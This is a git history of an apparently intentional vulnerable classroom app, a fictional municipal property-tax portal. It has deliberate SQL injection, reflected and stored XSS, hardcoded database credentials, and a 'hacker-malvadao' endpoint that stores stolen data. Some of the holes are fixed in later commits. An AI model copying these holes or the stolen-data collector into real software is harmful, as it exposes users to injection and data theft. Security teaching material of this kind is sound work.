commit c1a958460240dc39a5c6c487cc4381d5c2af3e8d
Author: lucasroqe <alvim.lucas2@hotmail.com>
Date:   Sat Mar 14 20:02:40 2026 -0300

    fix: CSRF no back

diff --git a/IPTU Piraporatuba do Sul/backend/src/server.ts b/IPTU Piraporatuba do Sul/backend/src/server.ts
index ea56001..4db775f 100644
--- a/IPTU Piraporatuba do Sul/backend/src/server.ts	
+++ b/IPTU Piraporatuba do Sul/backend/src/server.ts	
@@ -6,7 +6,7 @@ import hackerMalvadao from "./routes/hackerMalvadaoRoutes";
 
 const app = express();
 
-app.use(cors());
+app.use(cors({ origin: "http://localhost:5173" }));
 app.use(express.json());
 // app.use(express.urlencoded({ extended: true }));
 

commit 831b52d6171924506bd3c45121887949637b30b8
Author: lucasroqe <alvim.lucas2@hotmail.com>
Date:   Sat Mar 14 19:58:15 2026 -0300

    fix: XSS no front-end

diff --git a/IPTU Piraporatuba do Sul/.gitignore b/IPTU Piraporatuba do Sul/.gitignore
index 3f648e9..31e3feb 100644
--- a/IPTU Piraporatuba do Sul/.gitignore	
+++ b/IPTU Piraporatuba do Sul/.gitignore	
@@ -1,7 +1,7 @@
 # =========================
 # Node
 # =========================
-node_modules/
+node_modules
 npm-debug.log*
 yarn-debug.log*
 yarn-error.log*
diff --git a/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx b/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx
index d91a7c3..9473721 100644
--- a/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx	
+++ b/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx	
@@ -145,15 +145,11 @@ function Dashboard() {
         <ul>
           {comentarios.map((comentario, index) => (
             <li key={index}>
-              <div
-                dangerouslySetInnerHTML={{
-                  __html: `
-                  <strong>Usu├írio:</strong> ${comentario.usuario_id}
-                  <br/>
-                  <strong>Mensagem:</strong> ${comentario.texto}
-                `,
-                }}
-              />
+              <div>
+                <strong>Usu├írio:</strong> {comentario.usuario_id}
+                <br />
+                <strong>Mensagem:</strong> {comentario.texto}
+              </div>
             </li>
           ))}
         </ul>

commit 0a9449c1f63c2d2bc43f744da82f553d795efd50
Author: lucasroqe <alvim.lucas2@hotmail.com>
Date:   Sat Mar 14 19:47:48 2026 -0300

    fix: banco de dados (sql injection)

diff --git a/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts b/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts
index a9ee63e..cdde089 100644
--- a/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts	
+++ b/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts	
@@ -25,11 +25,11 @@ export const novoLogin = async (req: Request, res: Response) => {
     const iptuResult = await db.query(queryNomeIpuExiste);
 
     if (iptuResult.rowCount && iptuResult.rowCount > 0) {
-        const query = `INSERT INTO usuario (email, senha, nome, tipo_usuario_id) VALUES ('${email}', '${password}', '${nome}', 3)`;
+        const query = `INSERT INTO usuario (email, senha, nome, tipo_usuario_id) VALUES ($1, $2, $3, 3)`;
 
         console.log(`Query Executada: ${query}`);
 
-        const result = await db.query(query);
+        const result = await db.query(query, [email, password, nome]);
         
         const queryIdUsuario = `SELECT id FROM usuario WHERE email = '${email}' AND senha = '${password}'`;
         const resultIdUsuario = await db.query(queryIdUsuario);

commit faf6761b09b431b5510f9ddbbd70e3ae3537f130
Author: lucasroqe <alvim.lucas2@hotmail.com>
Date:   Sat Mar 14 19:35:32 2026 -0300

    init

diff --git a/IPTU Piraporatuba do Sul/.gitignore b/IPTU Piraporatuba do Sul/.gitignore
new file mode 100644
index 0000000..3f648e9
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/.gitignore	
@@ -0,0 +1,67 @@
+# =========================
+# Node
+# =========================
+node_modules/
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+pnpm-debug.log*
+package-lock.json
+yarn.lock
+pnpm-lock.yaml
+
+# Logs
+logs
+*.log
+
+# Runtime data
+pids
+*.pid
+*.seed
+*.pid.lock
+
+# =========================
+# Build / Dist
+# =========================
+dist/
+build/
+.out/
+.next/
+coverage/
+
+# =========================
+# Environment variables
+# =========================
+.env
+.env.*
+!.env.example
+
+# =========================
+# OS files
+# =========================
+.DS_Store
+Thumbs.db
+
+# =========================
+# IDE / Editor
+# =========================
+.vscode/
+.idea/
+*.swp
+*.swo
+
+# =========================
+# TypeScript
+# =========================
+*.tsbuildinfo
+
+# =========================
+# Testing
+# =========================
+coverage/
+jest.config.js.snap
+
+# =========================
+# Misc
+# =========================
+*.local
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/Dockerfile b/IPTU Piraporatuba do Sul/backend/Dockerfile
new file mode 100644
index 0000000..ff77dc0
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/Dockerfile	
@@ -0,0 +1,23 @@
+# server/Dockerfile
+FROM node:18-alpine
+
+# Diret├│rio de trabalho
+WORKDIR /app
+
+# Copia apenas os arquivos de depend├¬ncia primeiro
+COPY package.json package-lock.json* ./
+
+# Instala depend├¬ncias
+RUN npm install
+
+# Copia o restante do c├│digo
+COPY . .
+
+# Build do projeto
+RUN npm run build
+
+# Exp├Áe a porta
+EXPOSE 3001
+
+# Comando de start
+CMD ["node", "dist/server.js"]
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/package.json b/IPTU Piraporatuba do Sul/backend/package.json
new file mode 100644
index 0000000..a16647e
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/package.json	
@@ -0,0 +1,29 @@
+{
+  "name": "backend",
+  "version": "1.0.0",
+  "description": "",
+  "main": "server.js",
+  "scripts": {
+    "build": "tsc",
+    "start": "node dist/server.js",
+    "dev": "ts-node-dev --respawn --transpile-only src/server.ts"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "cors": "^2.8.6",
+    "express": "^5.2.1",
+    "pg": "^8.18.0",
+    "xss": "^1.0.15"
+  },
+  "devDependencies": {
+    "@types/better-sqlite3": "^7.6.13",
+    "@types/cors": "^2.8.19",
+    "@types/express": "^5.0.6",
+    "@types/node": "^25.2.3",
+    "@types/pg": "^8.16.0",
+    "ts-node-dev": "^2.0.0",
+    "typescript": "^5.9.3"
+  }
+}
diff --git a/IPTU Piraporatuba do Sul/backend/src/controllers/comentarioController.ts b/IPTU Piraporatuba do Sul/backend/src/controllers/comentarioController.ts
new file mode 100644
index 0000000..305c37e
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/controllers/comentarioController.ts	
@@ -0,0 +1,28 @@
+import { Request, Response } from "express";
+import db from "../database";
+
+export const criarComentario = async (req: Request, res: Response) => {
+    const { texto, usuarioId } = req.body;
+
+    const xss = require('xss');
+
+    const textoLimpo = xss(texto);
+    console.log(`Texto limpo: ${textoLimpo}`);
+    const query = `INSERT INTO comentario (texto, usuario_id) VALUES ($1, $2)`;
+
+    try {
+        await db.query(query, [textoLimpo, usuarioId]);
+        res.status(201).json({ message: "Coment├írio criado" });
+    } catch (err: any) {
+        res.status(500).json({ error: err.message });
+    }
+};
+
+export const listarComentarios = async (_req: Request, res: Response) => {
+    try {
+        const result = await db.query("SELECT * FROM comentario");
+        res.json(result.rows);
+    } catch (err: any) {
+        res.status(500).json({ error: err.message });
+    }
+};
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/src/controllers/hackerMalvadaoController.ts b/IPTU Piraporatuba do Sul/backend/src/controllers/hackerMalvadaoController.ts
new file mode 100644
index 0000000..5451737
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/controllers/hackerMalvadaoController.ts	
@@ -0,0 +1,16 @@
+import { Request, Response } from "express";
+import db from "../database";
+
+export const recepcionarDadosRoubados = async (req: Request, res: Response) => {
+    const { dados } = req.body;
+
+    const query = `INSERT INTO dados_roubados (dados) VALUES ($1)`;
+    console.log(`Recebendo dados roubados: ${dados}`);    
+    try {
+        await db.query(query, [dados]);
+        res.status(201).json({ message: "Dados recebidos com sucesso" });
+    } catch (err: any) {
+        res.status(500).json({ error: err.message });
+    }
+};
+
diff --git a/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts b/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts
new file mode 100644
index 0000000..a9ee63e
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/controllers/usuarioController.ts	
@@ -0,0 +1,97 @@
+import { Request, Response } from "express";
+import db from "../database";
+
+export const login = async (req: Request, res: Response) => {
+    const { email, password } = req.body;
+    console.log(`Recebendo login para email: ${req.body}`);
+    const query = 
+        `SELECT * FROM usuario WHERE email = $1 AND senha = $2`;
+
+    console.log(`Query Executada: ${query}`);
+
+    const result = await db.query(query, [email, password]);
+
+    if (result.rowCount && result.rowCount > 0) {
+        res.json({ success: true, user: result.rows[0] });
+    } else {
+        res.status(401).json({ success: false, message: "Falha no login" });
+    }
+};
+export const novoLogin = async (req: Request, res: Response) => {
+    const { email, password, nome } = req.body;
+
+    const nomeNormalizado = normalizarNome(nome);
+    const queryNomeIpuExiste = "SELECT * FROM iptu WHERE nome = '" + nomeNormalizado +"'";
+    const iptuResult = await db.query(queryNomeIpuExiste);
+
+    if (iptuResult.rowCount && iptuResult.rowCount > 0) {
+        const query = `INSERT INTO usuario (email, senha, nome, tipo_usuario_id) VALUES ('${email}', '${password}', '${nome}', 3)`;
+
+        console.log(`Query Executada: ${query}`);
+
+        const result = await db.query(query);
+        
+        const queryIdUsuario = `SELECT id FROM usuario WHERE email = '${email}' AND senha = '${password}'`;
+        const resultIdUsuario = await db.query(queryIdUsuario);
+        
+        const queryUpdateTabelaIptu = `UPDATE iptu set usuario_id = '${resultIdUsuario.rows[0].id}' WHERE nome = '${nomeNormalizado}'`;
+        const resultUpdate = await db.query(queryUpdateTabelaIptu);
+        
+
+        if (result.rowCount && result.rowCount > 0 && resultUpdate.rowCount && resultUpdate.rowCount > 0) {
+            res.json({ success: true, user: result.rows[0] });
+        } else {
+            res.status(401).json({ success: false, message: "Falha no login" });
+        }
+    } 
+    else 
+    {
+        res.status(404).json({ success: false, message: `Nome '${nome}' 'n├úo encontrado no cadastro de municipes` });
+    }
+};
+
+export const atualizarIptu = async (req: Request, res: Response) => {
+    const { usuarioId: usuarioId, novoValor: novoValor } = req.body;
+
+    const query = `UPDATE iptu SET valor = ${novoValor} WHERE usuario_id = ${usuarioId}`;
+
+    try {
+        await db.query(query);
+        res.json({ message: "IPTU atualizado" });
+    } catch (err: any) {
+        res.status(500).json({ error: err.message });
+    }
+};
+export const getIptuPorIdUsuario = async (req: Request, res: Response) => {
+    const usuarioId = req.query.usuarioId as string;
+
+    const query = `SELECT * FROM iptu WHERE usuario_id = ${usuarioId}`;
+    console.log(`Query Executada: ${query}`);
+    try {
+        const result = await db.query(query);
+        console.log(`Retorno: ${result}`);
+        res.json({ iptu: result.rows });
+    } catch (err: any) {
+        res.status(500).json({ error: err.message });
+    }
+};
+export const getQRCodeOrCodBarras = async (req: Request, res: Response) => {
+    const tipo = req.query.tipo as string;
+     let codigoHtml = "";
+
+  if (tipo === "codigoDeBarras") {
+    codigoHtml = `<img src="https://api.qrserver.com/v1/create-qr-code/?size=150x150&data=123456789" />`;
+  } else if (tipo === "qrcode") {
+    codigoHtml = `<img src="https://api.qrserver.com/v1/create-qr-code/?size=150x150&data=QRCodeDemo" />`;
+  }
+
+  res.send(`
+    <h2>Tipo selecionado: ${tipo}</h2>${codigoHtml}`);
+};
+export function normalizarNome(nome: string): string {
+    return nome
+        .normalize("NFD") // separa letra do acento
+        .replace(/[\u0300-\u036f]/g, "") // remove os acentos
+        .toUpperCase() // deixa tudo mai├║sculo
+        .trim(); // remove espa├ºos extras no come├ºo/fim
+}
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/src/database.ts b/IPTU Piraporatuba do Sul/backend/src/database.ts
new file mode 100644
index 0000000..239b20b
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/database.ts	
@@ -0,0 +1,11 @@
+import { Pool } from "pg";
+
+const pool = new Pool({
+  host: "postgres",
+  user: "admin",
+  password: "senha123",
+  database: "aula_db",
+  port: 5432,
+});
+
+export default pool;
diff --git a/IPTU Piraporatuba do Sul/backend/src/routes/comentarioRoutes.ts b/IPTU Piraporatuba do Sul/backend/src/routes/comentarioRoutes.ts
new file mode 100644
index 0000000..da6f039
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/routes/comentarioRoutes.ts	
@@ -0,0 +1,9 @@
+import { Router } from "express";
+import { criarComentario, listarComentarios } from "../controllers/comentarioController";
+
+const router = Router();
+
+router.post("/", criarComentario);
+router.get("/", listarComentarios);
+
+export default router;
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/src/routes/hackerMalvadaoRoutes.ts b/IPTU Piraporatuba do Sul/backend/src/routes/hackerMalvadaoRoutes.ts
new file mode 100644
index 0000000..a9389ce
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/routes/hackerMalvadaoRoutes.ts	
@@ -0,0 +1,8 @@
+import { Router } from "express";
+import { recepcionarDadosRoubados } from "../controllers/hackerMalvadaoController";
+
+const router = Router();
+
+router.post("/dados-roubados", recepcionarDadosRoubados);
+
+export default router;
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/src/routes/usuarioRoutes.ts b/IPTU Piraporatuba do Sul/backend/src/routes/usuarioRoutes.ts
new file mode 100644
index 0000000..803eec7
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/routes/usuarioRoutes.ts	
@@ -0,0 +1,12 @@
+import { Router } from "express";
+import { login, atualizarIptu, novoLogin, getIptuPorIdUsuario, getQRCodeOrCodBarras } from "../controllers/usuarioController";
+
+const router = Router();
+
+router.post("/login", login);
+router.post("/novo-login", novoLogin);
+router.post("/atualizar-iptu", atualizarIptu);
+router.get("/iptu-por-usuario", getIptuPorIdUsuario);
+router.get("/codigo-qr-ou-barra", getQRCodeOrCodBarras);
+
+export default router;
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/src/server.ts b/IPTU Piraporatuba do Sul/backend/src/server.ts
new file mode 100644
index 0000000..ea56001
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/src/server.ts	
@@ -0,0 +1,19 @@
+import express from "express";
+import cors from "cors";
+import userRoutes from "./routes/usuarioRoutes";
+import commentRoutes from "./routes/comentarioRoutes";
+import hackerMalvadao from "./routes/hackerMalvadaoRoutes";
+
+const app = express();
+
+app.use(cors());
+app.use(express.json());
+// app.use(express.urlencoded({ extended: true }));
+
+app.use("/usuario", userRoutes);
+app.use("/comentario", commentRoutes);
+app.use("/hacker-malvadao", hackerMalvadao);
+
+app.listen(3001, () => {
+    console.log("Servidor Vulner├ível rodando na porta 3001");
+});
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/backend/tsconfig.json b/IPTU Piraporatuba do Sul/backend/tsconfig.json
new file mode 100644
index 0000000..152efc1
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/backend/tsconfig.json	
@@ -0,0 +1,10 @@
+{
+  "compilerOptions": {
+    "target": "ES2020",
+    "module": "commonjs",
+    "rootDir": "src",
+    "outDir": "dist",
+    "esModuleInterop": true,
+    "strict": true
+  }
+}
diff --git a/IPTU Piraporatuba do Sul/docker-compose.yml b/IPTU Piraporatuba do Sul/docker-compose.yml
new file mode 100644
index 0000000..718a39d
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/docker-compose.yml	
@@ -0,0 +1,39 @@
+services:
+  backend:
+    build: ./backend
+    ports:
+      - "3001:3001"
+    networks:
+      - app-network
+    depends_on:
+      - postgres
+  frontend:
+    build: ./frontend
+    ports:
+      - "5173:80"
+    depends_on:
+      - backend
+    networks:
+      - app-network
+  postgres:
+    image: postgres:16
+    container_name: postgres-aula
+    restart: always
+    environment:
+      POSTGRES_DB: aula_db
+      POSTGRES_USER: admin
+      POSTGRES_PASSWORD: senha123
+    ports:
+      - "5432:5432"
+    networks:
+      - app-network
+    volumes:
+      - postgres_data:/var/lib/postgresql/data
+      - ./postgres:/docker-entrypoint-initdb.d
+
+networks:
+  app-network:
+    driver: bridge
+
+volumes:
+  postgres_data:
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/.gitignore b/IPTU Piraporatuba do Sul/frontend/.gitignore
new file mode 100644
index 0000000..a547bf3
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/.gitignore	
@@ -0,0 +1,24 @@
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+pnpm-debug.log*
+lerna-debug.log*
+
+node_modules
+dist
+dist-ssr
+*.local
+
+# Editor directories and files
+.vscode/*
+!.vscode/extensions.json
+.idea
+.DS_Store
+*.suo
+*.ntvs*
+*.njsproj
+*.sln
+*.sw?
diff --git a/IPTU Piraporatuba do Sul/frontend/Dockerfile b/IPTU Piraporatuba do Sul/frontend/Dockerfile
new file mode 100644
index 0000000..7ea679a
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/Dockerfile	
@@ -0,0 +1,20 @@
+# Stage 1 - Build
+FROM node:18-alpine AS builder
+
+WORKDIR /app
+
+COPY package*.json ./
+RUN npm install
+
+COPY . .
+RUN npm run build
+
+
+# Stage 2 - Servidor Nginx
+FROM nginx:alpine
+
+COPY --from=builder /app/dist /usr/share/nginx/html
+
+EXPOSE 80
+
+CMD ["nginx", "-g", "daemon off;"]
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/README.md b/IPTU Piraporatuba do Sul/frontend/README.md
new file mode 100644
index 0000000..86b2b11
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/README.md	
@@ -0,0 +1,75 @@
+# React + TypeScript + Vite
+
+This template provides a minimal setup to get React working in Vite with HMR and some ESLint rules.
+
+Currently, two official plugins are available:
+
+- [@vitejs/plugin-react](https://github.com/vitejs/vite-plugin-react/blob/main/packages/plugin-react) uses [Babel](https://babeljs.io/) (or [oxc](https://oxc.rs) when used in [rolldown-vite](https://vite.dev/guide/rolldown)) for Fast Refresh
+- [@vitejs/plugin-react-swc](https://github.com/vitejs/vite-plugin-react/blob/main/packages/plugin-react-swc) uses [SWC](https://swc.rs/) for Fast Refresh
+
+## React Compiler
+
+The React Compiler is enabled on this template. See [this documentation](https://react.dev/learn/react-compiler) for more information.
+
+Note: This will impact Vite dev & build performances.
+
+## Expanding the ESLint configuration
+
+If you are developing a production application, we recommend updating the configuration to enable type-aware lint rules:
+
+```js
+export default defineConfig([
+  globalIgnores(['dist']),
+  {
+    files: ['**/*.{ts,tsx}'],
+    extends: [
+      // Other configs...
+
+      // Remove tseslint.configs.recommended and replace with this
+      tseslint.configs.recommendedTypeChecked,
+      // Alternatively, use this for stricter rules
+      tseslint.configs.strictTypeChecked,
+      // Optionally, add this for stylistic rules
+      tseslint.configs.stylisticTypeChecked,
+
+      // Other configs...
+    ],
+    languageOptions: {
+      parserOptions: {
+        project: ['./tsconfig.node.json', './tsconfig.app.json'],
+        tsconfigRootDir: import.meta.dirname,
+      },
+      // other options...
+    },
+  },
+])
+```
+
+You can also install [eslint-plugin-react-x](https://github.com/Rel1cx/eslint-react/tree/main/packages/plugins/eslint-plugin-react-x) and [eslint-plugin-react-dom](https://github.com/Rel1cx/eslint-react/tree/main/packages/plugins/eslint-plugin-react-dom) for React-specific lint rules:
+
+```js
+// eslint.config.js
+import reactX from 'eslint-plugin-react-x'
+import reactDom from 'eslint-plugin-react-dom'
+
+export default defineConfig([
+  globalIgnores(['dist']),
+  {
+    files: ['**/*.{ts,tsx}'],
+    extends: [
+      // Other configs...
+      // Enable lint rules for React
+      reactX.configs['recommended-typescript'],
+      // Enable lint rules for React DOM
+      reactDom.configs.recommended,
+    ],
+    languageOptions: {
+      parserOptions: {
+        project: ['./tsconfig.node.json', './tsconfig.app.json'],
+        tsconfigRootDir: import.meta.dirname,
+      },
+      // other options...
+    },
+  },
+])
+```
diff --git a/IPTU Piraporatuba do Sul/frontend/eslint.config.js b/IPTU Piraporatuba do Sul/frontend/eslint.config.js
new file mode 100644
index 0000000..5e6b472
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/eslint.config.js	
@@ -0,0 +1,23 @@
+import js from '@eslint/js'
+import globals from 'globals'
+import reactHooks from 'eslint-plugin-react-hooks'
+import reactRefresh from 'eslint-plugin-react-refresh'
+import tseslint from 'typescript-eslint'
+import { defineConfig, globalIgnores } from 'eslint/config'
+
+export default defineConfig([
+  globalIgnores(['dist']),
+  {
+    files: ['**/*.{ts,tsx}'],
+    extends: [
+      js.configs.recommended,
+      tseslint.configs.recommended,
+      reactHooks.configs.flat.recommended,
+      reactRefresh.configs.vite,
+    ],
+    languageOptions: {
+      ecmaVersion: 2020,
+      globals: globals.browser,
+    },
+  },
+])
diff --git a/IPTU Piraporatuba do Sul/frontend/index.html b/IPTU Piraporatuba do Sul/frontend/index.html
new file mode 100644
index 0000000..072a57e
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/index.html	
@@ -0,0 +1,13 @@
+<!doctype html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <link rel="icon" type="image/svg+xml" href="/vite.svg" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>frontend</title>
+  </head>
+  <body>
+    <div id="root"></div>
+    <script type="module" src="/src/main.tsx"></script>
+  </body>
+</html>
diff --git a/IPTU Piraporatuba do Sul/frontend/package.json b/IPTU Piraporatuba do Sul/frontend/package.json
new file mode 100644
index 0000000..d08caeb
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/package.json	
@@ -0,0 +1,33 @@
+{
+  "name": "frontend",
+  "private": true,
+  "version": "0.0.0",
+  "type": "module",
+  "scripts": {
+    "dev": "vite",
+    "build": "tsc -b && vite build",
+    "lint": "eslint .",
+    "preview": "vite preview"
+  },
+  "dependencies": {
+    "axios": "^1.13.5",
+    "react": "^19.2.0",
+    "react-dom": "^19.2.0",
+    "react-router-dom": "^7.13.0"
+  },
+  "devDependencies": {
+    "@eslint/js": "^9.39.1",
+    "@types/node": "^24.10.1",
+    "@types/react": "^19.2.7",
+    "@types/react-dom": "^19.2.3",
+    "@vitejs/plugin-react": "^5.1.1",
+    "babel-plugin-react-compiler": "^1.0.0",
+    "eslint": "^9.39.1",
+    "eslint-plugin-react-hooks": "^7.0.1",
+    "eslint-plugin-react-refresh": "^0.4.24",
+    "globals": "^16.5.0",
+    "typescript": "~5.9.3",
+    "typescript-eslint": "^8.48.0",
+    "vite": "^7.3.1"
+  }
+}
diff --git a/IPTU Piraporatuba do Sul/frontend/public/vite.svg b/IPTU Piraporatuba do Sul/frontend/public/vite.svg
new file mode 100644
index 0000000..e7b8dfb
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/public/vite.svg	
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="iconify iconify--logos" width="31.88" height="32" preserveAspectRatio="xMidYMid meet" viewBox="0 0 256 257"><defs><linearGradient id="IconifyId1813088fe1fbc01fb466" x1="-.828%" x2="57.636%" y1="7.652%" y2="78.411%"><stop offset="0%" stop-color="#41D1FF"></stop><stop offset="100%" stop-color="#BD34FE"></stop></linearGradient><linearGradient id="IconifyId1813088fe1fbc01fb467" x1="43.376%" x2="50.316%" y1="2.242%" y2="89.03%"><stop offset="0%" stop-color="#FFEA83"></stop><stop offset="8.333%" stop-color="#FFDD35"></stop><stop offset="100%" stop-color="#FFA800"></stop></linearGradient></defs><path fill="url(#IconifyId1813088fe1fbc01fb466)" d="M255.153 37.938L134.897 252.976c-2.483 4.44-8.862 4.466-11.382.048L.875 37.958c-2.746-4.814 1.371-10.646 6.827-9.67l120.385 21.517a6.537 6.537 0 0 0 2.322-.004l117.867-21.483c5.438-.991 9.574 4.796 6.877 9.62Z"></path><path fill="url(#IconifyId1813088fe1fbc01fb467)" d="M185.432.063L96.44 17.501a3.268 3.268 0 0 0-2.634 3.014l-5.474 92.456a3.268 3.268 0 0 0 3.997 3.378l24.777-5.718c2.318-.535 4.413 1.507 3.936 3.838l-7.361 36.047c-.495 2.426 1.782 4.5 4.151 3.78l15.304-4.649c2.372-.72 4.652 1.36 4.15 3.788l-11.698 56.621c-.732 3.542 3.979 5.473 5.943 2.437l1.313-2.028l72.516-144.72c1.215-2.423-.88-5.186-3.54-4.672l-25.505 4.922c-2.396.462-4.435-1.77-3.759-4.114l16.646-57.705c.677-2.35-1.37-4.583-3.769-4.113Z"></path></svg>
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/App.css b/IPTU Piraporatuba do Sul/frontend/src/App.css
new file mode 100644
index 0000000..b9d355d
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/App.css	
@@ -0,0 +1,42 @@
+#root {
+  max-width: 1280px;
+  margin: 0 auto;
+  padding: 2rem;
+  text-align: center;
+}
+
+.logo {
+  height: 6em;
+  padding: 1.5em;
+  will-change: filter;
+  transition: filter 300ms;
+}
+.logo:hover {
+  filter: drop-shadow(0 0 2em #646cffaa);
+}
+.logo.react:hover {
+  filter: drop-shadow(0 0 2em #61dafbaa);
+}
+
+@keyframes logo-spin {
+  from {
+    transform: rotate(0deg);
+  }
+  to {
+    transform: rotate(360deg);
+  }
+}
+
+@media (prefers-reduced-motion: no-preference) {
+  a:nth-of-type(2) .logo {
+    animation: logo-spin infinite 20s linear;
+  }
+}
+
+.card {
+  padding: 2em;
+}
+
+.read-the-docs {
+  color: #888;
+}
diff --git a/IPTU Piraporatuba do Sul/frontend/src/App.tsx b/IPTU Piraporatuba do Sul/frontend/src/App.tsx
new file mode 100644
index 0000000..ea0ae14
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/App.tsx	
@@ -0,0 +1,14 @@
+import { Routes, Route } from "react-router-dom";
+import Login from "./Login";
+import Dashboard from "./Dashboard";
+
+function App() {
+  return (
+    <Routes>
+      <Route path="/" element={<Login />} />
+      <Route path="/dashboard" element={<Dashboard />} />
+    </Routes>
+  );
+}
+
+export default App;
\ No newline at end of file
diff --git a/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx b/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx
new file mode 100644
index 0000000..d91a7c3
--- /dev/null
+++ b/IPTU Piraporatuba do Sul/frontend/src/Dashboard.tsx	
@@ -0,0 +1,196 @@
+import axios from "axios";
+import { useEffect, useState } from "react";
+
+import type { Comentario } from "./Tipos/Comentario";
+import type { Iptuu } from "./Tipos/Iptuu";
+
+function Dashboard() {
+  const user = JSON.parse(localStorage.getItem("user") || "{}");
+
+  const [menuAberto, setMenuAberto] = useState(false);
+  const [iptu, setIptu] = useState<Iptuu | null>(null);
+  const [comentarios, setComentarios] = useState<Comentario[]>([]);
+  const [novoComentario, setNovoComentario] = useState("");
+  const [tipoCodigo, setTipoCodigo] = useState("codigoDeBarras");
+  const [htmlRetorno, setHtmlRetorno] = useState("");
+
+  useEffect(() => {
+    const buscarDados = async () => {
+      try {
+
+        const response = await axios.get<{ iptu: Iptuu[] }>(
+          "http://localhost:3001/usuario/iptu-por-usuario?usuarioId=" + user.id
+        );
+
+        setIptu(response.data.iptu[0]);
+      } catch (error) {
+        console.error("Erro ao buscar IPTU", error);
+      }
+    };
+
+    const buscarComentarios = async () => {
+      try {
+        const response = await axios.get(
+          "http://localhost:3001/comentario"
+        );
+
+        setComentarios(response.data);
+      } catch (error) {
+        console.error("Erro ao buscar coment├írios", error);
+      }
+    };
+    if (user?.id) {
+      buscarDados();
+      buscarComentarios();
+    }
+  }, [user]);
+
+  const enviarComentario = async () => {
+    if (!novoComentario.trim()) return;
+
+    try {
+      await axios.post("http://localhost:3001/comentario", {
+        usuarioId: user.id,
+        texto: novoComentario,
+      });
+
+      // Atualiza lista ap├│s enviar
+      const response = await axios.get("http://localhost:3001/comentario");
+      setComentarios(response.data);
+
+      setNovoComentario("");
+    } catch (error) {
+      console.error("Erro ao enviar coment├írio", error);
+    }
+  };
+  const buscarCodigo = async () => {
+    const response = await axios.get(
+      "http://localhost:3001/usuario/codigo-qr-ou-barra?tipo=" + tipoCodigo
+    );
+
+    setHtmlRetorno(response.data);
+  };
+
+  // dados fict├¡cios de IPTU
+
+
+  return (
+    <div style={styles.container}>
+      <header style={styles.header}>
+        <h2>Bem-vindo, {user.nome}</h2>
+
+        <div style={{ position: "relative" }}>
+          <button onClick={() => setMenuAberto(!menuAberto)}>
+            Ôÿ░ Menu
+          </button>
+
+          {menuAberto && (
+            <div style={styles.dropdown}>
+              <button onClick={() => alert("Listar Mun├¡cipes")}>
+                Listar Mun├¡cipes
+              </button>
+              <button onClick={() => alert("Outra op├º├úo")}>
+                Outra op├º├úo
+              </button>
+            </div>
+          )}
+        </div>
+      </header>
+
+      <div style={styles.card}>
+        <h3>IPTU</h3>
+        {iptu && <p>Valor IPTU: {iptu.valor}</p>}
+        {/* <p>Status: {iptu && iptu.pago ? "Pago Ô£à" : "Em aberto ÔØî"}</p> */}
+        <p>Status: {iptu?.valor}</p>
+      </div>
+      <select
+        value={tipoCodigo}
+        onChange={(e) => setTipoCodigo(e.target.value)}
+      >
+        <option value="codigoDeBarras">C├│digo de Barras</option>
+        <option value="qrcode">QR Code</option>
+      </select>
+
+      <button onClick={buscarCodigo}>
+        Gerar C├│digo
+      </button>
+      {htmlRetorno && (
+        <div
+          dangerouslySetInnerHTML={{
+            __html: htmlRetorno,
+          }}
+        />
+      )}
+      <div style={{ padding: "40px" }}>
+        <h2>Lista de Coment├írios</h2>
